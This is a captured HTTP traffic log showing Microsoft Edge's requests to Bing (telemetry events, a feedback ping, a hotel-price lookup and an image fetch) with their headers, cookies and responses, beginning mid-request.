user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

cache-control: public, max-age=600
content-type: image/png
access-control-allow-headers: Content-Type,X-FD-Features,X-FD-FLIGHT,PreferAnonymous
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: *
x-bm-traceid: 6c8d796c5db644e4ab871fbe2650d2e2
x-bm-srv: mapsplatform-frontend-b64849bbd-9zv9z, mapsplatform-imagery-service-645d78b797-7wldx
x-ms-bm-ws-info: 0
x-bm-fe-elapsed: 238
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6C8D796C5DB644E4AB871FBE2650D2E2 Ref B: LON212050719029 Ref C: 2024-12-04T10:08:15Z
date: Wed, 04 Dec 2024 10:08:15 GMT
content-length: 40269
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10790
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum34%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f109b9
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f34%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f109cc
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f109dc
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 261
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306895.7f10a32
GET

https://www.bing.com/local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%22ced0929c-c686-46b0-b6e9-a16678105547%22&count=100&htlsource=localhp&originig=5AD7030C91584719B4F5E41231459495&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /local/hotelprice?q=Hotels&filters=local_filters%3a%22UR4U%22+hotel_filters%3a%22LHP-0_HHP-%C2%A3500+_SD-01192025_ED-01202025%22+segment%3a%22Hotel%22+cacheid%3a%22ced0929c-c686-46b0-b6e9-a16678105547%22&count=100&htlsource=localhp&originig=5AD7030C91584719B4F5E41231459495&inDate=01/19/2025&outDate=01/20/2025&localypids=YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1545x256073263|48.36305618286133|4.332777976989746,YN2000x6096471577638952817|48.29521179199219|4.135970115661621,YN2000x1190976147452155201|48.32417678833008|4.305159091949463,YN1544x243384812|48.328407287597656|4.115884780883789,YN2000x9391523170225958935|48.42100524902344|4.479507923126221,YN2000x4457774376323358039|48.33100891113281|4.099302768707275,YN2000x10959879645415552720|48.45736312866211|4.123088836669922,YN2000x11722354772439687545|48.42161560058594|4.480012893676758 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306896.7f10a73
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306886757%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886940%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306886757%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306886940%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
